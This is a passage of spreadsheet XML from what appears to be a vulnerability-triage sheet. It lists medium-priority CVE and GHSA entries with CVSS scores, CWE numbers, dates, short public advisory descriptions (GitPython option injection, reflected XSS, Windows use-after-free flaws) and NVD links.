t="inlineStr" /><c r="K1237" s="5" t="inlineStr" /><c r="L1237" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M1237" s="5" t="inlineStr" /><c r="N1237" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1237" s="5" t="inlineStr" /><c r="P1237" s="5" t="inlineStr" /><c r="Q1237" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R1237" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-4gmw-gg2m-w46p. This link is maintained to preserve external references.

## Original Description
GitPython versions before 3.1.58 contain an arbitrary file overwrite vulnerability in IndexFile.from_tree, IndexFile.reset, and IndexFile.merge_tree methods that append caller-influenced treeish strings to git read-tree without option validation or argument separation. Attackers can inject the --index-output option to overwrite arbitrary files with a valid git-index blob, destroying existing file content at attacker-controlled writable paths.</t></is></c><c r="S1237" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-7jx3-jqcp-hhgc</t></is></c></row><row r="1238"><c r="A1238" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1238" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1238" s="5" t="inlineStr"><is><t>CVE-2020-37277</t></is></c><c r="D1238" s="5" t="n"><v>7.1</v></c><c r="E1238" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1238" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1238" s="5" t="inlineStr" /><c r="H1238" s="5" t="n"><v>0.003</v></c><c r="I1238" s="5" t="inlineStr" /><c r="J1238" s="5" t="inlineStr" /><c r="K1238" s="5" t="inlineStr" /><c r="L1238" s="5" t="inlineStr" /><c r="M1238" s="5" t="inlineStr" /><c r="N1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1238" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1238" s="5" t="inlineStr" /><c r="Q1238" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1238" s="5" t="inlineStr"><is><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is></c><c r="S1238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2020-37277</t></is></c></row><row r="1239"><c r="A1239" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1239" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1239" s="5" t="inlineStr"><is><t>CVE-2022-35499</t></is></c><c r="D1239" s="5" t="n"><v>7.1</v></c><c r="E1239" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1239" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1239" s="5" t="inlineStr" /><c r="H1239" s="5" t="n"><v>0.003</v></c><c r="I1239" s="5" t="inlineStr" /><c r="J1239" s="5" t="inlineStr" /><c r="K1239" s="5" t="inlineStr" /><c r="L1239" s="5" t="inlineStr" /><c r="M1239" s="5" t="inlineStr" /><c r="N1239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1239" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1239" s="5" t="inlineStr" /><c r="Q1239" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1239" s="5" t="inlineStr"><is><t>In Trimble TM4WEB 21.4.0.4, the external bill viewer endpoint is vulnerable to reflected cross-site scripting via injection in a arbitrary parameter appended to the URL.</t></is></c><c r="S1239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2022-35499</t></is></c></row><row r="1240"><c r="A1240" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1240" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1240" s="5" t="inlineStr"><is><t>CVE-2025-29419</t></is></c><c r="D1240" s="5" t="n"><v>7.1</v></c><c r="E1240" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1240" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1240" s="5" t="inlineStr" /><c r="H1240" s="5" t="n"><v>0.002</v></c><c r="I1240" s="5" t="inlineStr" /><c r="J1240" s="5" t="inlineStr" /><c r="K1240" s="5" t="inlineStr" /><c r="L1240" s="5" t="inlineStr" /><c r="M1240" s="5" t="inlineStr" /><c r="N1240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1240" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P1240" s="5" t="inlineStr" /><c r="Q1240" s="5" t="inlineStr"><is><t>CWE-300</t></is></c><c r="R1240" s="5" t="inlineStr"><is><t>CTFd v3.7.6 was discovered to be vulnerable to a man-in-the-middle attack.</t></is></c><c r="S1240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-29419</t></is></c></row><row r="1241"><c r="A1241" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1241" s="5" t="inlineStr"><is><t>CVE-2026-11573</t></is></c><c r="D1241" s="5" t="n"><v>7.1</v></c><c r="E1241" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1241" s="5" t="inlineStr"><is><t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t></is></c><c r="G1241" s="5" t="inlineStr" /><c r="H1241" s="5" t="n"><v>0.004</v></c><c r="I1241" s="5" t="inlineStr" /><c r="J1241" s="5" t="inlineStr" /><c r="K1241" s="5" t="inlineStr" /><c r="L1241" s="5" t="inlineStr" /><c r="M1241" s="5" t="inlineStr" /><c r="N1241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1241" s="5" t="inlineStr" /><c r="Q1241" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R1241" s="5" t="inlineStr"><is><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is></c><c r="S1241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t></is></c></row><row r="1242"><c r="A1242" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1242" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1242" s="5" t="inlineStr"><is><t>CVE-2026-16281</t></is></c><c r="D1242" s="5" t="n"><v>7.1</v></c><c r="E1242" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1242" s="5" t="inlineStr" /><c r="H1242" s="5" t="n"><v>0.002</v></c><c r="I1242" s="5" t="inlineStr" /><c r="J1242" s="5" t="inlineStr" /><c r="K1242" s="5" t="inlineStr" /><c r="L1242" s="5" t="inlineStr" /><c r="M1242" s="5" t="inlineStr" /><c r="N1242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1242" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1242" s="5" t="inlineStr" /><c r="Q1242" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1242" s="5" t="inlineStr"><is><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is></c><c r="S1242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16281</t></is></c></row><row r="1243"><c r="A1243" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1243" s="5" t="inlineStr"><is><t>CVE-2026-16769</t></is></c><c r="D1243" s="5" t="n"><v>7.1</v></c><c r="E1243" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1243" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G1243" s="5" t="inlineStr" /><c r="H1243" s="5" t="n"><v>0.001</v></c><c r="I1243" s="5" t="inlineStr" /><c r="J1243" s="5" t="inlineStr" /><c r="K1243" s="5" t="inlineStr" /><c r="L1243" s="5" t="inlineStr" /><c r="M1243" s="5" t="inlineStr" /><c r="N1243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1243" s="5" t="inlineStr" /><c r="Q1243" s="5" t="inlineStr"><is><t>CWE-440</t></is></c><c r="R1243" s="5" t="inlineStr"><is><t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t></is></c><c r="S1243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t></is></c></row><row r="1244"><c r="A1244" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1244" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1244" s="5" t="inlineStr"><is><t>CVE-2026-19051</t></is></c><c r="D1244" s="5" t="n"><v>7.1</v></c><c r="E1244" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1244" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G1244" s="5" t="inlineStr" /><c r="H1244" s="5" t="n"><v>0.002</v></c><c r="I1244" s="5" t="inlineStr" /><c r="J1244" s="5" t="inlineStr" /><c r="K1244" s="5" t="inlineStr" /><c r="L1244" s="5" t="inlineStr" /><c r="M1244" s="5" t="inlineStr" /><c r="N1244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1244" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1244" s="5" t="inlineStr" /><c r="Q1244" s="5" t="inlineStr"><is><t>CWE-256</t></is></c><c r="R1244" s="5" t="inlineStr"><is><t>Plaintext storage of a password vulnerability in Menulux Software Inc. Menulux Portal allows Retrieve Embedded Sensitive Data.

This issue affects Menulux Portal: before 20260903211448.</t></is></c><c r="S1244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19051</t></is></c></row><row r="1245"><c r="A1245" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1245" s="5" t="inlineStr"><is><t>CVE-2026-20293</t></is></c><c r="D1245" s="5" t="n"><v>7.1</v></c><c r="E1245" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1245" s="5" t="inlineStr"><is><t>psirt@cisco.com</t></is></c><c r="G1245" s="5" t="inlineStr" /><c r="H1245" s="5" t="n"><v>0.001</v></c><c r="I1245" s="5" t="inlineStr" /><c r="J1245" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1245" s="5" t="inlineStr" /><c r="L1245" s="5" t="inlineStr" /><c r="M1245" s="5" t="inlineStr" /><c r="N1245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1245" s="5" t="inlineStr" /><c r="Q1245" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="R1245" s="5" t="inlineStr"><is><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is></c><c r="S1245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t></is></c></row><row r="1246"><c r="A1246" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1246" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1246" s="5" t="inlineStr"><is><t>CVE-2026-52762</t></is></c><c r="D1246" s="5" t="n"><v>7.1</v></c><c r="E1246" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1246" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1246" s="5" t="inlineStr" /><c r="H1246" s="5" t="n"><v>0.004</v></c><c r="I1246" s="5" t="inlineStr" /><c r="J1246" s="5" t="inlineStr" /><c r="K1246" s="5" t="inlineStr" /><c r="L1246" s="5" t="inlineStr" /><c r="M1246" s="5" t="inlineStr" /><c r="N1246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1246" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1246" s="5" t="inlineStr" /><c r="Q1246" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R1246" s="5" t="inlineStr"><is><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is></c><c r="S1246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52762</t></is></c></row><row r="1247"><c r="A1247" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1247" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1247" s="5" t="inlineStr"><is><t>CVE-2026-53603</t></is></c><c r="D1247" s="5" t="n"><v>7.1</v></c><c r="E1247" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1247" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1247" s="5" t="inlineStr" /><c r="H1247" s="5" t="n"><v>0.002</v></c><c r="I1247" s="5" t="inlineStr" /><c r="J1247" s="5" t="inlineStr" /><c r="K1247" s="5" t="inlineStr" /><c r="L1247" s="5" t="inlineStr" /><c r="M1247" s="5" t="inlineStr" /><c r="N1247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1247" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1247" s="5" t="inlineStr" /><c r="Q1247" s="5" t="inlineStr"><is><t>CWE-312, CWE-522</t></is></c><c r="R1247" s="5" t="inlineStr"><is><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is></c><c r="S1247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53603</t></is></c></row><row r="1248"><c r="A1248" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1248" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1248" s="5" t="inlineStr"><is><t>CVE-2026-53604</t></is></c><c r="D1248" s="5" t="n"><v>7.1</v></c><c r="E1248" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1248" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1248" s="5" t="inlineStr" /><c r="H1248" s="5" t="n"><v>0.001</v></c><c r="I1248" s="5" t="inlineStr" /><c r="J1248" s="5" t="inlineStr" /><c r="K1248" s="5" t="inlineStr" /><c r="L1248" s="5" t="inlineStr" /><c r="M1248" s="5" t="inlineStr" /><c r="N1248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1248" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1248" s="5" t="inlineStr" /><c r="Q1248" s="5" t="inlineStr"><is><t>CWE-212, CWE-316</t></is></c><c r="R1248" s="5" t="inlineStr"><is><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is></c><c r="S1248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53604</t></is></c></row><row r="1249"><c r="A1249" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1249" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1249" s="5" t="inlineStr"><is><t>CVE-2026-56702</t></is></c><c r="D1249" s="5" t="n"><v>7.1</v></c><c r="E1249" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1249" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1249" s="5" t="inlineStr" /><c r="H1249" s="5" t="n"><v>0.003</v></c><c r="I1249" s="5" t="inlineStr" /><c r="J1249" s="5" t="inlineStr" /><c r="K1249" s="5" t="inlineStr" /><c r="L1249" s="5" t="inlineStr" /><c r="M1249" s="5" t="inlineStr" /><c r="N1249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1249" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1249" s="5" t="inlineStr" /><c r="Q1249" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c r="R1249" s="5" t="inlineStr"><is><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is></c><c r="S1249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56702</t></is></c></row><row r="1250"><c r="A1250" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1250" s="5" t="inlineStr"><is><t>CVE-2026-66305</t></is></c><c r="D1250" s="5" t="n"><v>7.1</v></c><c r="E1250" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1250" s="5" t="inlineStr" /><c r="H1250" s="5" t="n"><v>0.003</v></c><c r="I1250" s="5" t="inlineStr" /><c r="J1250" s="5" t="inlineStr" /><c r="K1250" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1250" s="5" t="inlineStr" /><c r="M1250" s="5" t="inlineStr" /><c r="N1250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1250" s="5" t="inlineStr" /><c r="Q1250" s="5" t="inlineStr"><is><t>CWE-603</t></is></c><c r="R1250" s="5" t="inlineStr"><is><t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="S1250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t></is></c></row><row r="1251"><c r="A1251" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1251" s="5" t="inlineStr"><is><t>CVE-2026-68835</t></is></c><c r="D1251" s="5" t="n"><v>7.1</v></c><c r="E1251" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1251" s="5" t="inlineStr" /><c r="H1251" s="5" t="n"><v>0.005</v></c><c r="I1251" s="5" t="inlineStr" /><c r="J1251" s="5" t="inlineStr" /><c r="K1251" s="5" t="inlineStr" /><c r="L1251" s="5" t="inlineStr" /><c r="M1251" s="5" t="inlineStr" /><c r="N1251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1251" s="5" t="inlineStr" /><c r="Q1251" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1251" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t></is></c></row><row r="1252"><c r="A1252" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1252" s="5" t="inlineStr"><is><t>CVE-2026-68846</t></is></c><c r="D1252" s="5" t="n"><v>7.1</v></c><c r="E1252" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1252" s="5" t="inlineStr" /><c r="H1252" s="5" t="n"><v>0.006</v></c><c r="I1252" s="5" t="inlineStr" /><c r="J1252" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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52" s="5" t="inlineStr" /><c r="M1252" s="5" t="inlineStr" /><c r="N1252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1252" s="5" t="inlineStr" /><c r="Q1252" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1252" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t></is></c></row><row r="1253"><c r="A1253" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1253" s="5" t="inlineStr"><is><t>CVE-2026-68889</t></is></c><c r="D1253" s="5" t="n"><v>7.1</v></c><c r="E1253" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1253" s="5" t="inlineStr" /><c r="H1253" s="5" t="n"><v>0.004</v></c><c r="I1253" s="5" t="inlineStr" /><c r="J1253" s="5" t="inlineStr" /><c r="K1253" s="5" t="inlineStr" /><c r="L1253" s="5" t="inlineStr" /><c r="M1253" s="5" t="inlineStr" /><c r="N1253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1253" s="5" t="inlineStr" /><c r="Q1253" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R1253" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t></is></c></row><row r="1254"><c r="A1254" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1254" s="5" t="inlineStr"><is><t>CVE-2026-68893</t></is></c><c r="D1254" s="5" t="n"><v>7.1</v></c><c r="E1254" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1254" s="5" t="inlineStr" /><c r="H1254" s="5" t="n"><v>0.005</v></c><c r="I1254" s="5" t="inlineStr" /><c r="J1254" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1254" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1254" s="5" t="inlineStr" /><c r="M1254" s="5" t="inlineStr" /><c r="N1254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1254" s="5" t="inlineStr" /><c r="Q1254" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1254" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t></is></c></row><row r="1255"><c r="A1255" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1255" s="5" t="inlineStr"><is><t>CVE-2026-69272</t></is></c><c r="D1255" s="5" t="n"><v>7.1</v></c><c r="E1255" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1255" s="5" t="inlineStr" /><c r="H1255" s="5" t="n"><v>0.004</v></c><c r="I1255" s="5" t="inlineStr" /><c r="J1255" s="5" t="inlineStr" /><c r="K1255" s="5" t="inlineStr" /><c r="L1255" s="5" t="inlineStr" /><c r="M1255" s="5" t="inlineStr" /><c r="N1255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1255" s="5" t="inlineStr" /><c r="Q1255" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1255" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t></is></c></row><row r="1256"><c r="A1256" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1256" s="5" t="inlineStr"><is><t>CVE-2026-69274</t></is></c><c r="D1256" s="5" t="n"><v>7.1</v></c><c r="E1256" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1256" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1256" s="5" t="inlineStr" /><c r="H1256" s="5" t="n"><v>0.004</v></c><c r="I1256" s="5" t="inlineStr" /><c r="J1256" s="5" t="inlineStr" /><c r="K1256" s="5" t="inlineStr" /><c r="L1256" s="5" t="inlineStr" /><c r="M1256" s="5" t="inlineStr" /><c r="N1256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1256" s="5" t="inlineStr" /><c r="Q1256" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1256" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t></is></c></row><row r="1257"><c r="A1257" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1257" s="5" t="inlineStr"><is><t>CVE-2026-69296</t></is></c><c r="D1257" s="5" t="n"><v>7.1</v></c><c r="E1257" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1257" s="5" t="inlineStr" /><c r="H1257" s="5" t="n"><v>0.005</v></c><c r="I1257" s="5" t="inlineStr" /><c r="J1257" s="5" t="inlineStr" /><c r="K1257" s="5" t="inlineStr" /><c r="L1257" s="5" t="inlineStr" /><c r="M1257" s="5" t="inlineStr" /><c r="N1257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1257" s="5" t="inlineStr" /><c r="Q1257" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1257" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t></is></c></row><row r="1258"><c r="A1258" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1258" s="5" t="inlineStr"><is><t>CVE-2026-69305</t></is></c><c r="D1258" s="5" t="n"><v>7.1</v></c><c r="E1258" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1258" s="5" t="inlineStr" /><c r="H1258" s="5" t="n"><v>0.006</v></c><c r="I1258" s="5" t="inlineStr" /><c r="J1258" s="5" t="inlineStr" /><c r="K1258" s="5" t="inlineStr" /><c r="L1258" s="5" t="inlineStr" /><c r="M1258" s="5" t="inlineStr" /><c r="N1258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1258" s="5" t="inlineStr" /><c r="Q1258" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1258" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t></is></c></row><row r="1259"><c r="A1259" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1259" s="5" t="inlineStr"><is><t>CVE-2026-69313</t></is></c><c r="D1259" s="5" t="n"><v>7.1</v></c><c r="E1259" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1259" s="5" t="inlineStr" /><c r="H1259" s="5" t="n"><v>0.005</v></c><c r="I1259" s="5" t="inlineStr" /><c r="J1259" s="5" t="inlineStr" /><c r="K1259" s="5" t="inlineStr" /><c r="L1259" s="5" t="inlineStr" /><c r="M1259" s="5" t="inlineStr" /><c r="N1259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1259" s="5" t="inlineStr" /><c r="Q1259" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1259" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t></is></c></row><row r="1260"><c r="A1260" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1260" s="5" t="inlineStr"><is><t>CVE-2026-69314</t></is></c><c r="D1260" s="5" t="n"><v>7.1</v></c><c r="E1260" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1260" s="5" t="inlineStr" /><c r="H1260" s="5" t="n"><v>0.005</v></c><c r="I1260" s="5" t="inlineStr" /><c r="J1260" s="5" t="inlineStr" /><c r="K1260" s="5" t="inlineStr" /><c r="L1260" s="5" t="inlineStr" /><c r="M1260" s="5" t="inlineStr" /><c r="N1260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1260" s="5" t="inlineStr" /><c r="Q1260" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1260" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1260" s="6" 